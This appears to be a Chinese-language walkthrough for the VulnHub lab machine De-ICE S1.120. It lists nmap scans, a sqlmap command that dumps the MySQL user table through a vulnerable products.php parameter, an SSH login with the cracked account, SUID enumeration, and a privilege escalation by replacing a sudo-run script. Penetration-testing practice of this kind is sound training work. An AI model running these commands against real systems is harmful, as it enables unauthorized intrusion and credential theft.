信息收集:
靶机地址:https://www.vulnhub.com/entry/de-ice-s1120,10/
(1)配置ip
给kali设置一个仅主机模式,跟靶机的ip在同一个网段
(2)扫描ip
nmap 192.168.1.0/24 -sn | grep -B 2 '00:0C:29:AB:64:6F'
(3)端口扫描
nmap 192.168.1.120 -p- -A
getshell:
(1)访问页面,点击“添加产品”
(2)点击输入并提交
(4)sqlmap
http://192.168.1.120/products.php?id=1
(5)跑出账号密码
python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" -D mysql -T user --dump --batch
(6)使用ccoffee用户进行ssh远程连接
ssh ccoffee@192.168.1.120
提权:
(1)运行以下命令来枚举具有 SUID 权限的所有二进制文件
find / -perm -u=s -type f 2>/dev/null
(2)从截图中可以看出,在列出的所有用户中,用户 ccoffee
为位于路径 /home/ccoffee/scripts/getlogs.sh
命令启用了 SUID 位,这意味着我们可以执行 getlogs.sh
命令内的任何命令
(3)切换到/home/ccoffee/scripts/目录下
cd /home/ccoffee/scripts/
(4)将 getlogs.sh
移动到 getlogs.sh.bak
,然后使用以下代码创建一个新的 getlogs.sh
文件以生成 shell
(5)使用 sudo
执行getlogs.sh
文件
(6)提权成功